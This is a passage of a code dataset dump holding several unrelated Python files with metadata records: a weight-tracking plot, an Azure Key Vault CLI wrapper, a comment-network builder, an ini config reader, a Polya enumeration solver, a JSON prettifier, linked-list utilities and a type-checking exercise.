weight_df['Date']]\n \n maximum_val = maximum_val + (maximum_val / 10)\n minimum_val = minimum_val - (minimum_val / 10)\n\n fig = plt.figure()\n axis1 = fig.add_axes([0.1,0.1,0.8,0.2])\n axis2 = fig.add_axes([0.1,0.3,0.8,0.6])\n \n axis1.plot(index,bmi)\n axis2.plot(index,weight)\n \n axis2.set_title(\"Weight Monitoring\")\n axis1.set_xlabel(\"Date\")\n axis1.set_ylabel(\"BMI\")\n axis2.set_ylabel(\"Weight\")\n \n axis1.set_xticklabels(dates)\n axis2.set_xticklabels([])\n \n labels = [tick for tick in axis1.get_yticks()]\n axis1.set_yticklabels(labels[:-1])\n \n axis2.set_ylim(minimum_val, maximum_val)\n \n fig.canvas.draw()\n \n plt.savefig(\"/home/aaron/Projects/health/output/weight_vs_time.png\")\n","sub_path":"plot/base_plot.py","file_name":"base_plot.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"131241036","text":"import subprocess as sp\nimport json\nimport logging\nimport sys\n\nclass KeyVaultClientCli(object):\n\n _sp_shell_flag: bool = False\n\n # Logging 
preparation.\n #-----------------------------------------------------------------------------\n\n # Retrieve the main logger; picks up parent logger instance if invoked as a module.\n _logger = logging.getLogger(__name__)\n '''\n logger: Logger instance used to process all module log statements.\n '''\n\n def __init__(self):\n \n if sys.platform == \"linux\" or sys.platform == \"linux2\":\n self._sp_shell_flag = False\n elif sys.platform == \"win32\":\n self._sp_shell_flag = True\n\n def get_kv_certificate(\n self, \n kv_name: str, \n cert_name: str):\n \"\"\"Function that retrieves a certificate stored in KeyVault\n\n :param kv_name: KeyVault name\n :type kv_name: str\n :param cert_name: Certificate name\n :type cert_name: str\n \n :return: certificate (json deserialized)\n :rtype: dict\n :raises: :class:`Exception`\n \"\"\"\n\n try:\n certificate_extract_command = [\n 'az',\n 'keyvault',\n 'certificate',\n 'show',\n '--vault-name', kv_name,\n '--name', cert_name\n ]\n\n certificate_output = sp.check_output(certificate_extract_command, shell=self._sp_shell_flag, universal_newlines=True)\n\n self._logger.debug('The extract certificate command executed successfully, producing the following output: {}'\n .format(certificate_output))\n\n # Convert the output to a json object.\n return json.loads(certificate_output)\n except sp.CalledProcessError as e:\n\n self._logger.error('It was not possible to get a certificate from KeyVault.')\n self._logger.error('The following error occurred: ' + str(e))\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n except ValueError as e:\n self._logger.error(e)\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n\n def set_aad_sp_kv_access(\n self, \n kv_name: str, \n service_principal_id: str):\n \"\"\"Function that sets access policy values on a KeyVault instance\n\n :param kv_name: KeyVault name\n :type kv_name: str\n :param service_principal_id: Service principal id\n :type service_principal_id: str\n \n :raises: :class:`Exception`\n \"\"\"\n\n try:\n # Add Principal To Key Vault\n #-----------------------------------------------------------------------------\n\n self._logger.debug('Adding the established AAD principal application to key vault.')\n\n kv_add_principal_command = [\n 'az',\n 'keyvault',\n 'set-policy',\n '--name', kv_name,\n '--spn', service_principal_id,\n '--key-permissions', 'encrypt', 'decrypt', 'wrapKey', 'unwrapKey', 'sign',\n 'verify', 'get', 'list', 'create', 'update', 'import', 'delete', 'backup',\n 'restore', 'recover', 'purge',\n '--secret-permissions', 'get', 'list', 'set', 'delete', 'backup', 'restore',\n 'recover', 'purge',\n '--certificate-permissions', 'get', 'list', 'delete', 'create', 'import',\n 'update', 'managecontacts', 'getissuers', 'listissuers', 'setissuers',\n 'deleteissuers', 'manageissuers', 'recover', 'purge'\n ]\n\n sp.check_call(kv_add_principal_command, shell=self._sp_shell_flag, universal_newlines=True)\n except sp.CalledProcessError as e:\n\n self._logger.error('It was not possible to add a service principal to KeyVault.')\n self._logger.error('The following error occurred: ' + str(e))\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n except ValueError as e:\n self._logger.error(e)\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n\n def create_kv_encryption_keys(\n self, \n key_name: str, \n kv_name: str):\n \"\"\"Function that creates encryption keys in KeyVault\n\n :param key_name: Encryption key name\n :type key_name: str\n :param kv_name: KeyVault name\n :type kv_name: str\n \n :return: Encryption Key ID\n :rtype: str\n :raises: :class:`Exception`\n \"\"\"\n\n try:\n\n self._logger.debug('Creating a new encryption key.')\n\n # Create encryption key.\n #-----------------------------------------------------------------------------\n \n create_key_command = [\n 'az',\n 'keyvault',\n 'key',\n 'create',\n '--name', key_name, \n '--protection', 'hsm',\n '--vault-name', kv_name,\n '--size', '2048'\n ]\n\n key_output = sp.check_output(create_key_command, shell=self._sp_shell_flag, universal_newlines=True)\n\n self._logger.debug('The create key command executed successfully, producing the following output: {}'\n .format(key_output))\n\n # Convert the output to a json object.\n json_key_output = json.loads(key_output)\n\n # Check if the command returned a key definition.\n if len(json_key_output) <= 0:\n raise ValueError('The key output does not contain a key definition.')\n \n key_id = json_key_output['key']['kid']\n\n return key_id\n \n except sp.CalledProcessError as e:\n\n self._logger.error('It was not possible to create the {} key.'.format(key_name))\n self._logger.error('The following error occurred: ' + str(e))\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)\n except ValueError as e:\n \n self._logger.error(e)\n sys.exit(1) # Exit the module as it is not possible to progress the deployment.\n raise(e)","sub_path":"orchestration/integration/cli/keyvault_client.py","file_name":"keyvault_client.py","file_ext":"py","file_size_in_byte":6451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"70438683","text":"import re\nfrom network_creators.gefx.nodes_edges_creator import NodesEdgesCreator\n\n\nclass AuthorUserUserComments(NodesEdgesCreator):\n\n def __init__(self, author):\n self.author = author\n\n def create(self, articles):\n #articles = filter(lambda a: a['author'] == self.author, articles)\n authors = []\n all_users = []\n for article in articles:\n authorName = article['author']\n author = self.__find_or_create_author(authors, authorName)\n users = self.__get_users_from_comments(article['comments'])\n for user in users:\n author.add_commentator(user)\n if user not in all_users:\n all_users.append(user)\n for comment in article['comments']:\n matches = re.match(\"^(@[^\\s]+)\", comment['content'])\n if matches is not None:\n nick = matches.group(0)[1:]\n if 'http://' not in nick:\n user_author = self.__find_or_create_author(authors, nick)\n user_author.add_commentator(comment['author'])\n nodes = self.__build_nodes(authors, all_users)\n return nodes, authors\n\n def __find_or_create_author(self, authors, authorName):\n found = list(filter(lambda a: a.name == authorName, authors))\n if len(found) > 0:\n author = found[0]\n else:\n author = Author(authorName)\n authors.append(author)\n return author\n\n def __get_users_from_comments(self, comments):\n users = []\n for comment in comments:\n user = comment['author']\n if user not in users:\n users.append(user)\n return users\n\n def __build_nodes(self, authors, all_users):\n nodes = []\n for author in authors:\n nodes.append(author)\n for user in all_users:\n nodes.append(user)\n return nodes\n\n\nclass Author:\n def __init__(self, name):\n self.name = name\n self.edges = {}\n\n def add_commentator(self, user):\n self.__assure_user_in_dict(user)\n self.edges[user] += 1\n\n def 
__assure_user_in_dict(self, user):\n if user not in self.edges:\n self.edges[user] = 0\n\n def __str__(self):\n return self.name\n","sub_path":"network_creators/author_user_user_comments.py","file_name":"author_user_user_comments.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"7550637","text":"from PublicMethod.OperateIniFile import OperateIni\n\nclass DataBaseInfoManager(OperateIni):\n '''Reads the database settings from the config file'''\n def __init__(self,SectionName,Filename='DataBaseInfo.ini'):\n super().__init__(Filename)\n self.SectionName=SectionName\n self.Data=self.get_section_data(SectionName)\n\n def get_value(self, Key):\n '''Gets the value for the specified key'''\n for key,value in self.Data.items():\n if key==Key:\n return value\n\n def modify_database_name(self,Value,Key=\"databasename\"):\n '''Modifies the DataBaseName entry in the config'''\n self.modify_section_data(self.SectionName,Value,Key)\n\nclass IniFileInfo():\n \"\"\"Organizes the data from ini files\"\"\"\n def __init__(self,*configfilenames):\n self.inisectiondata = []\n for configfilename in configfilenames:\n self.ini_all_section_data(configfilename)\n\n # def ini_all_section_data(self):\n # self.all_section_data=dict()\n # for section in self.section_namelist:\n # sectiondata=self.operationini.get_section_data(section)\n # for key,value in sectiondata.items():\n # valuelist=value.split(\",\")\n # sectiondata[key]=valuelist\n # self.all_section_data[section]=sectiondata\n\n def ini_all_section_data(self,filename):\n '''Reads an ini file and assembles its data'''\n # self.white_section_data = dict()\n # self.commontable_section_data = dict()\n section_data=dict()\n # for file in self.configfilenames:\n self.operationini=OperateIni(filename=filename,encoding=\"gbk\")\n self.section_namelist=self.operationini.section_name\n for section in self.section_namelist:\n sectiondata=self.operationini.get_section_data(section)\n for key,value in sectiondata.items():\n valuelist=value.split(\",\")\n sectiondata[key]=valuelist\n section_data[section]=sectiondata\n self.inisectiondata.append(section_data)\n # if filename==\"whiteList.ini\":\n # self.white_section_data[section]=sectiondata\n # elif filename==\"commTable.ini\":\n # self.commontable_section_data[section]=sectiondata\n\n # def get_key_value(self,keyname:str):\n # '''Iterates over all sections and returns the value of the specified key in each'''\n # keyvaluelist=[]\n # for section in self.section_namelist:\n # sectiondata=self.operationini.get_section_data(section)\n # for key,value in sectiondata.items():\n # if key==keyname:\n # keyvaluelist.append(value)\n # return keyvaluelist\n\n\nif __name__=='__main__':\n Info=DataBaseInfoManager(\"TargetDataBase\")\n # print(Info.get_value(\"databasename\"))\n # Info.modify_database_name(\"123\")\n w=IniFileInfo(\"whiteList.ini\", \"commTable.ini\")\n # print(w.white_section_data)\n # print(w.commontable_section_data)\n print(w.inisectiondata[0])\n print(w.inisectiondata[1])\n\n\n","sub_path":"DatabaseCommander/DataBaseUserInfo.py","file_name":"DataBaseUserInfo.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
{"seq_id":"328905748","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nAUTHORS: Conrad W. Rosenbrock, Wiley S. Morgan (October 2014)\n\nClasses to support the calculation of coefficients for specific terms in a product\nof multinomials. Construct a product class by specifying the exponent and target term\nand then add multinomials using the Product instance's append(). 
The coefficient is\nthen available from the coeff().\n\nEXAMPLE: find the coefficient of x^4.y^4.z^4 in 3*(x+y+z)^3*(x^2+y^2+z^2)^3*(x^3+y^3+z^3).\nANSWER: 162 from Mathematica\n\n>> p = Product(3, [4,4,4])\n>> p.append(Multinomial(1,3))\n>> p.append(Multinomial(2,3))\n>> p.append(Multinomial(3,1))\n>> print(p.coeff())\n162\n\"\"\"\nclass Sequence(object):\n \"\"\"Represents an exponent-limited sequence with a single root. Here, sequence represents a\n sequence of integer values k_1, k_2...k_j that are the exponents of a single term in a multinomial.\n The root of the sequence is one of the k_i; its children become sets of sequences including\n variables to the right of i.\n \"\"\"\n def __init__(self, root, possibles, i, powersum, targets, parent=None):\n \"\"\"Initializes a sequence collector for a variable. If 'Term' refers to a product\n of variables like x^i.y^j.z^k, then x has index 0, y has index 1, etc.\n\n :arg root: the exponent of the variable to the left in the multinomial term.\n :arg possibles: a list of possible values for each variable in the multinomial.\n :arg i: the index of the variable being sequenced in the term.\n :arg powersum: the maximum value that the sum of exponents in the sequence is allowed to have.\n :arg parent: a Sequence instance for the variable to the *left* of this one\n (i.e. has index i-1).\n \"\"\"\n self._root = root\n self.used = root + (0 if parent is None else parent.used)\n self.parent = parent\n\n #We keep recursively defining sequences until we run out of variables in\n #the term. Possibles is a list of possible exponents for each variable in the\n #term and has the same number of items as variables in the term.\n if i < len(targets):\n #Filter the possible values for the variable being considered based on the\n #exponent of the multinomial. 
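For instance, for Multinomial(2, 3), i.e.\n #(x^2+y^2+z^2)^3, the possible exponents of each variable are [0, 2, 4, 6]. 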
When multinomials are expanded, the sum of\n #the exponents in any term must be less than the exponent on the multinomial\n #times the maximum power of any of its (unexpanded) terms.\n\n #We find all the possible values for this variable by ensuring that:\n # 1) it's exponent is compatible with the exponents of all variables to the left of it.\n # 2) the exponent we are suggesting is in the list of possible values for the variable.\n # 3) the exponent remains positive.\n self.kids = [Sequence(p-root, possibles, i+1, powersum, targets, self) \n for p in possibles if p-root >= 0\n and p-root <= targets[i]\n and abs(p - root) <= powersum-self.used \n and abs(p-self.used) % possibles[1] == 0]\n else:\n self.kids = []\n\n self._kidcount = None\n self.varcount = len(targets)\n\n @property\n def kidcount(self):\n \"\"\"Returns the number of children and grandchildren to the last generation.\"\"\"\n if self._kidcount is None:\n _kidcount = sum([k.kidcount for k in self.kids])\n if _kidcount == 0:\n _kidcount = len(self.kids)\n return _kidcount\n\n def expand(self, depth=0):\n \"\"\"Recursively generates a list of all relevant sequences for this multinomial term.\"\"\"\n #Iterate through the child sequences and add their variable root values if\n #the total sequence sums to the target.\n sequences = []\n for kid in self.kids:\n for seq in kid.expand(depth+1):\n #Here is where the recursion happens; we add the sequence of this variable's\n #children to the right of this root.\n sequences.append((self._root,) + seq)\n\n if len(self.kids) == 0:\n if depth == self.varcount-1:\n return [(self._root,)]\n else:\n return [(self._root,) + (0,)*(self.varcount-(depth+1))]\n else:\n return sequences\n\n def expand_noappend(self, sequences, start, varindex):\n \"\"\"Implements an expansion that doesn't use python's append.\"\"\"\n if len(sequences) == 0:\n if self.kidcount == 0:\n raise ValueError(\"This can't happen!\")\n sequences = [[0]*self.varcount for i in range(self.kidcount)]\n\n cursor = start\n for kid in self.kids:\n kid.expand_noappend(sequences, cursor, varindex+1)\n cursor += kid.kidcount\n\n if varindex == self.varcount-1:\n cursor += 1\n\n for k in range(start, cursor):\n sequences[k][varindex-1] = self._root\n start = cursor\n\n if self.kidcount == 0:\n sequences[cursor][varindex-1] = self._root\n \n return sequences\n\nclass Product(object):\n \"\"\"Represents a product of multinomials for which only a single term is interesting.\"\"\"\n def __init__(self, coefficient, targets):\n \"\"\"Initializes the empty product of multinomials.\n\n :arg coefficient: the scalar integer multiplying this product of multinomials.\n :arg targets: a list of exponents for the only interesting term in the product. 
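For the module-level example (x^4.y^4.z^4) this would be [4,4,4]. 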
The\n list is in the order that the variables appear in each multinomial.\n \"\"\"\n self.coefficient = coefficient\n self.targets = targets\n self.multinoms = []\n\n def coeff(self):\n \"\"\"Returns the coefficient of the term with the target exponents if all the multinomials\n in the product were expanded and had their terms collected.\n \"\"\"\n #If this is an isolated multinomial, we only need to check the coefficient of the target\n #term.\n if len(self.multinoms) == 1:\n if all([self.multinoms[0].power-t>0 for t in self.targets]):\n return 0\n else:\n return self.multinoms[0].nchoosekm(self.targets)*self.coefficient\n \n from itertools import product\n #Get a list of the possible exponents for each variable in each of the multinomials.\n #We start with the first variable and choose only those combinations of exponents\n #across *all* the multinomials that give the correct target exponent for that variable.\n possibles = [n.possible_powers for n in self.multinoms]\n seq0 = [s for s in product(*possibles) if sum(s) == self.targets[0]]\n\n #Next, we construct Sequence instances for each of the first-variable-compatible\n #possibilities and follow them through to the other variables.\n coeffs = 0\n for seq in seq0:\n mnseq = []\n #Each sequence calculated from the first variable has an entry for each multinomial\n #in this product. The Sequence instances construct smart sequences for the remaining\n #variables in each multinomial separately.\n for i in range(len(seq)):\n varseq = Sequence(seq[i], possibles[i], 1, self.multinoms[i].powersum, self.targets)\n mnseq.append(varseq.expand())\n coeffs += self._sum_sequences(mnseq)\n\n return int(coeffs)*self.coefficient\n\n def _sum_sequences(self, mnseq):\n \"\"\"Sums all the possible combinations of relevant sequences based on the variable sequence\n lists specified.\n\n :arg mnseq: a list of possible variable sequences in each multinomial (one for each multinomial)\n that might contribute to the correct target variable.\n \"\"\"\n from itertools import product\n from operator import mul\n from functools import reduce\n #We can also filter the sequences by enforcing the constraints that the exponents\n #correctly reproduce the target across all the multinomials in the product. 
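For example, with targets [4,4,4] and two multinomials, a combination\n #like ((4,2,0), (0,2,4)) is kept because the per-variable sums are (4,4,4), while ((4,2,0), (0,0,4)) is dropped. 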
Get hold\n #of all the combinations of sequences across the multinomials and check each for\n #conformance to the targets.\n coeffs = 0\n for seq in product(*mnseq):\n expsum = [sum(zs) for zs in zip(*seq)]\n if expsum == self.targets:\n coeffs += reduce(mul, [m.nchoosekm(s) for m, s in zip(self.multinoms, seq)])\n\n return coeffs\n\n def __str__(self):\n #First we need to sort the multinomials by their exponent.\n sortedmns = sorted(self.multinoms, key=(lambda m: (m.exponent,m.power)), reverse=True)\n return str(self.coefficient) + ''.join([str(mn) for mn in sortedmns]) \n\nclass Multinomial(object):\n \"\"\"Represents a multinomial expansion.\"\"\"\n def __init__(self, power, exponent=1):\n \"\"\"Sets up the multinomial.\n\n :arg powers: the power on each of the *unexpanded* variables in the multinomial;\n of the form (x^2+y^2+z^2) => 2.\n :arg exponent: the exponent of the entire multinomial.\n \"\"\"\n self.power = power\n self.exponent = exponent\n self.powersum = power*exponent\n \"\"\"Returns the integer value that all term exponents in the multinomial should\n sum to (or be less than).\"\"\"\n self.possible_powers = list(range(0,power*exponent+1, power))\n \"\"\"For each variable being considered, determines the possible powers based\n on the exponent in the multinomial.\"\"\"\n\n def __str__(self):\n #We want to print the multinomial out in a nice, readable way, similar to how\n #they are presented in Mathematica.\n #contents = ' + '.join([\"{}\".format(p) for p in self.powers])\n return \"({})^{}\".format(self.power, self.exponent)\n\n def normed_seq(self, seq):\n \"\"\"Normalizes the specified sequence using the powers of unexpanded terms in the multinomial.\n \n :arg seq: a list of exponents in an *expanded* term.\n \"\"\"\n return [int(ai/self.power) for ai in seq]\n\n def nchoosekm(self, sequence):\n \"\"\"Returns the number of different ways to partition an n-element\n set into disjoint subsets of sizes k1, ..., km.\n\n :arg sequence: an un-normed tuple of form (k1, k2, k3).\n \"\"\"\n prod = 1\n if not all([seq%self.power == 0 for seq in sequence]):\n return 0\n else:\n normseq = self.normed_seq(sequence)\n for i in range(len(sequence)):\n nsum = sum(normseq[0:i+1])\n prod *= Multinomial.nchoosek(nsum, normseq[i])\n\n return prod\n \n @staticmethod\n def nchoosek(n, k):\n \"\"\"This implementation was taken from \"Binomial Coefficient Computation: Recursion \n or Iteration?\" by Yannis Manolopoulos, ACM SIGCSE Bulletin InRoads, Vol.34, No.4, \n December 2002. 
http://delab.csd.auth.gr/papers/SBI02m.pdf It is supposed to be robust\n        against large intermediate values and to have optimal complexity.\n        \"\"\"\n        if k < 0 or k > n:\n            return 0\n        if k==0 and n == 0:\n            return 1\n        t = 1\n        #Use floor division: each intermediate value of t is itself an exact binomial\n        #coefficient, so the arithmetic stays in exact integers where Python 3's true\n        #division would produce floats and lose precision for large n.\n        if k < n-k:\n            for i in range(n, n-k, -1):\n                t = t*i//(n-i+1)\n        else:\n            for i in range(n, k, -1):\n                t = t*i//(n-i+1)\n\n        return t\n\ndef group(gen):\n    \"\"\"Generates an entire group using the specified generators by applying generators\n    to each other recursively.\n\n    :arg gen: a list of generators as integers.\n    \"\"\"\n    from operator import itemgetter as iget\n    def g_apply(operations, source, groupi=None):\n        \"\"\"Applies the specified group operations to the source list of elements and then\n        appends it to the group if it is unique.\n        \"\"\"\n        result = list(iget(*operations)(source))\n        if groupi is not None and result not in groupi:\n            groupi.append(result)\n        return result\n\n    #Make sure the group is zero-based for python.\n    if 0 not in gen[0]:\n        ngens = [list(map(lambda e: e-1, g)) for g in gen]\n    else:\n        ngens = gen\n\n    groupi = []\n    for i in ngens:\n        for j in ngens: #filter(lambda k: k!=i, ngens):\n            c = g_apply(i, j, groupi)\n            d = g_apply(i, c, groupi)\n            while d != c:\n                d = g_apply(i, d, groupi)\n\n    while True:\n        group2 = []\n        for i in ngens:\n            for h in groupi:\n                d = g_apply(i, h)\n                if d not in groupi and d not in group2:\n                    group2.append(d)\n\n        groupi.extend(group2)\n        if len(group2) == 0:\n            break\n    return groupi\n\ndef _group_to_cyclic(group, limit=None):\n    \"\"\"Determines the degeneracy of each r-cycle in the specified group operations.\"\"\"\n    result = []\n    #We allow filtering so that the unit testing can access the cyclic form of the group.\n    if limit is not None:\n        filtered = group[limit[0]:limit[1]]\n    else:\n        filtered = group\n\n    for operation in filtered:\n        #visited has the same # of elements as the group operation and is used to make sure each\n        #element in the array is visited as we loop through in a *non-sequential* order.\n        visited = [0]*len(operation)\n        polynomials = {}\n\n        while 0 in visited:\n            #Start with the first element in the group that hasn't been visited yet. The first\n            #non-trivial polynomials have powers > 0.\n            cursor = vindex = visited.index(0)\n            powers = 1\n            #change the current position to having been visited; move the cursor.\n            visited[cursor] = 1\n            cursor = operation[cursor]\n\n            #The power of the variables in the polynomials is equal to the number of group operations\n            #separating the cursor's current position from its *value* in the group operations list.\n            while cursor != vindex:\n                visited[cursor] = 1\n                powers += 1\n                cursor = operation[cursor]\n\n            #We now have everything needed to construct part of the polynomial. 
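\n            #(Illustrative, hypothetical permutations: the identity [0, 1, 2, 3] yields\n            #{1: 4}, i.e. four 1-cycles, while the cyclic shift [1, 2, 3, 0] yields {4: 1}.)\n            #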
This is done by taking powers\n #and using it to construct an array of length equal to the number of elements in the system \n #each entry in the array is set to be equal to powers.\n if powers not in polynomials:\n polynomials[powers] = 1\n else:\n polynomials[powers] += 1\n\n result.append(polynomials)\n\n return result\n\ndef polya(concentrations, group, debug=False):\n \"\"\"Uses a group and concentrations to find the number of unique arrangements as described by \n polya.\n \n :arg concentrations: specify a list of integers specifying how many of each coloring should\n be present in each of the enumerated lists.\n :arg group: group operations for permuting the colorings.\n \"\"\"\n\n #This is to check that the concentrations sum to the number of sites the group is\n #operating on\n if sum(concentrations) != len(group[1]):\n print(\"The concentrations don't sum to the number of things the group is acting on!\")\n exit()\n\n if 0 not in group[0]:\n group = [[j -1 for j in i] for i in group]\n \n polyndict = {}\n #The operations in the group are used to construct the unique polynomials for each operation.\n for polynomials in _group_to_cyclic(group):\n #Construct a product of multinomials for this group operation.\n p = Product(1,concentrations)\n for exp in polynomials:\n p.multinoms.append(Multinomial(exp, polynomials[exp]))\n\n key = str(p)\n if key not in polyndict:\n polyndict[key] = p\n else:\n polyndict[key].coefficient += 1\n\n if debug:\n for key in polyndict:\n print(str(polyndict[key]), \" => \", polyndict[key].coeff())\n\n rad = sum([p.coeff() for p in polyndict.values()])\n return int(rad/float(len(group))) \n\ndef _examples():\n \"\"\"Print some examples on how to use this python version of the code.\"\"\"\n helptext = (\"For all the examples below, it is assumed that you know the fixed concentration \"\n \"term T in advance. This term is the first, *positional* argument to the script. \"\n \"In addition to the term T, you need to specify the group operations as permutation \"\n \"lists. They can be either zero- or one-based. Group operations can be specified \"\n \"with the group generators or as a 2D matrix with all the group operations; if the \"\n \"lists of values were saved directly from python using a __repr__ or __str__ then \"\n \"use the '-parse' argument to specify that.\")\n egs = [(\"Find the Polya Coefficient with Group Generators\",\n \"The code below finds the number of unique ways to color a square with 4 corners using \"\n \"2 different colors such that there are 2 corners with each color. \"\n \"The group is specified using generators in a file called 'generators.in.paper'. The \"\n \"contents of the generators file are:\\n 4 3 2 1\\n 2 3 4 1\\nand are the generators \"\n \"for the dihedral group of degree 4.\", \"./polya.py 2 2 -generators generators.in.paper\"),\n (\"Find the Polya Coefficient with an Entire Group\",\n \"This code also finds the coefficient, but for a larger group with 144 operations acting \"\n \"on a finite set with 20 elements. The term T is specified as [4,4,4,2,2,2,2] so that we \"\n \"want 4 of the first 3 colors and 2 of the last 4 colors with 7, the total number of \"\n \"colors in the enumeration. 
The group file 'group.out.cr6' can be viewed in the repo at \"\n           \"'polya/fortran/tests/'.\", \"./polya.py 4 4 4 2 2 2 2 -group group.out.cr6\")]\n\n    print(\"POLYA ENUMERATION THEOREM SOLVER\\n\")\n    for eg in egs:\n        title, desc, code = eg\n        print(\"--\" + title + '--\\n')\n        print(desc + '\\n')\n        print(' ' + code + '\\n')\n\ndef _parser_options(phelp=False):\n    \"\"\"Parses the options and arguments from the command line.\"\"\"\n    import argparse\n    parser = argparse.ArgumentParser(description=\"Polya Coefficient Calculator\")\n    parser.add_argument(\"-generators\",\n                        help=(\"Specify the name/path to a file that lists the generators for \"\n                              \"the symmetry group defining uniqueness on the lattice.\"))\n    parser.add_argument(\"-group\",\n                        help=(\"Specify the name/path to a file listing the *entire* set of group \"\n                              \"symmetry operations defining uniqueness on the lattice.\"))\n    parser.add_argument(\"-parse\", choices=[\"python\", \"text\"], default=\"text\",\n                        help=(\"Choose how the group files will be interpreted by the script:\\n\"\n                              \"- 'python': the text is assumed to be a valid python expression, \\n\"\n                              \"\\tsuch as a list, and is interpreted using eval(). \\n\"\n                              \"- 'text': text values are split on whitespace and converted to \\n\"\n                              \"\\tintegers. One group operation/generator per line.\"))\n    parser.add_argument(\"concentrations\", type=int, nargs=\"*\", default=[0],\n                        help=(\"The number of each type of coloring in the concentration restricted \"\n                              \"enumeration on a lattice.\"))\n    parser.add_argument(\"-debug\", action=\"store_true\",\n                        help=\"Print verbose polya polynomial information for debugging.\")\n    parser.add_argument(\"-examples\", action=\"store_true\",\n                        help=\"Print some examples for how to use the Polya solver.\")\n\n    vardict = vars(parser.parse_args())\n    if phelp or vardict[\"examples\"]:\n        _examples()\n        exit(0)\n    return vardict\n\ndef _read_file(args, filepath):\n    \"\"\"Parses the contents of the specified file using the 'parse' arguments from script args.\"\"\"\n    from os import path\n    contents = []\n    with open(path.expanduser(filepath)) as f:\n        if args[\"parse\"] == \"text\":\n            for line in f:\n                #Materialize each row as a list; later code calls len() on these rows and\n                #iterates them more than once, which a lazy map object would not allow.\n                contents.append(list(map(int, line.split())))\n        else:\n            contents = eval(f.read())\n\n    return contents\n\ndef script_polya(args):\n    \"\"\"Calculates the number of unique ways to enumerate a fixed set of colorings on a lattice\n    subject to a set of symmetry operations.\n    \"\"\"\n    if not args[\"generators\"] and not args[\"group\"]:\n        _parser_options(True)\n\n    if args[\"generators\"]:\n        gens = _read_file(args, args[\"generators\"])\n        grpops = group(gens)\n    elif args[\"group\"]:\n        grpops = _read_file(args, args[\"group\"])\n\n    coeff = polya(args[\"concentrations\"], grpops, args[\"debug\"])\n    print(coeff)\n    return coeff\n\nif __name__ == '__main__':\n    script_polya(_parser_options())\n","sub_path":"python/polya.py","file_name":"polya.py","file_ext":"py","file_size_in_byte":20984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"402792579","text":"#!/usr/bin/python\n\n# Usage:\n# 1. Place this script in /Library/Application Support/BBEdit/Text Filters\n# 2. 
Restart BBEdit, and Text -> Apply Text Filter -> prettyJSON\n#\n# References: http://www.kyleclegg.com/blog/tidy-json-formatting-with-textwrangler\n\nimport fileinput\nimport json\n\nif __name__ == '__main__':\n    jsonStr = ''\n    for aline in fileinput.input():\n        jsonStr = jsonStr + ' ' + aline.strip()\n    jsonObj = json.loads(jsonStr)\n    print(json.dumps(jsonObj, ensure_ascii=False, sort_keys=True, indent=2).encode('utf8'))\n","sub_path":"python_tool/BBEdit scripts/prettyJSON.py","file_name":"prettyJSON.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"443130959","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\"\"\"\n\n\nclass ListNode:\n    def __init__(self, x=None):\n        self.val = x\n        self.next = None\n\n\ndef add_two_numbers(l1, l2):\n    if not l1 or not l2:\n        return l1 or l2\n    tmp = 0\n    pnode = phead = ListNode(-1)\n    while l1 or l2 or tmp:\n        if l1:\n            tmp += l1.val\n            l1 = l1.next\n        if l2:\n            tmp += l2.val\n            l2 = l2.next\n        pnode.next = ListNode(tmp % 10)\n        pnode = pnode.next\n        tmp //= 10\n    return phead.next\n\n\ndef merge_two_lists(l1, l2):\n    if not l1 or not l2:\n        return l1 or l2\n\n    pnode = phead = ListNode(-1)\n    while l1 and l2:\n        if l1.val < l2.val:\n            pnode.next = l1\n            l1 = l1.next\n        else:\n            pnode.next = l2\n            l2 = l2.next\n        pnode = pnode.next\n    pnode.next = l1 or l2\n\n    return phead.next\n\n\ndef merge_k_lists(lists):\n    if not lists:\n        return\n\n    if len(lists) == 1:\n        return lists[0]\n\n    if len(lists) == 2:\n        return merge_two_lists(lists[0], lists[1])\n\n    mid = len(lists) // 2\n    left = lists[:mid]\n    right = lists[mid:]\n\n    left_head = merge_k_lists(left)\n    right_head = merge_k_lists(right)\n\n    return merge_two_lists(left_head, right_head)\n\n\ndef swap_pairs(head: ListNode) -> ListNode:\n    #Recursively swap every two adjacent nodes and return the new head.\n    if not head or not head.next:\n        return head\n    second = head.next\n    head.next = swap_pairs(second.next)\n    second.next = head\n    return second\n","sub_path":"src/leetcode/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"303423839","text":"'''\nTask #1\nCreate a list and fill it with elements of various data types. Implement a script\nthat checks the data type of each element. Use the type() function for the check.\nThe list elements do not have to be requested from the user; they may be given\nexplicitly in the program.\n'''\n\nmy_list = [10, 29878546547780, 25.33, 'String', None, [12, None, 'abc'], False, complex(5, 6), b'text', (1, 'cde', None), {'1' : 'a', '2' : 'b'}, set([15, False, 'xyz']), bytearray(b'some text')]\nprint('Created list:', my_list, end = '\\n\\n')\n\n'''\n# Elements of three lists are combined into tuples\n# 1) A list of human-readable type names. 
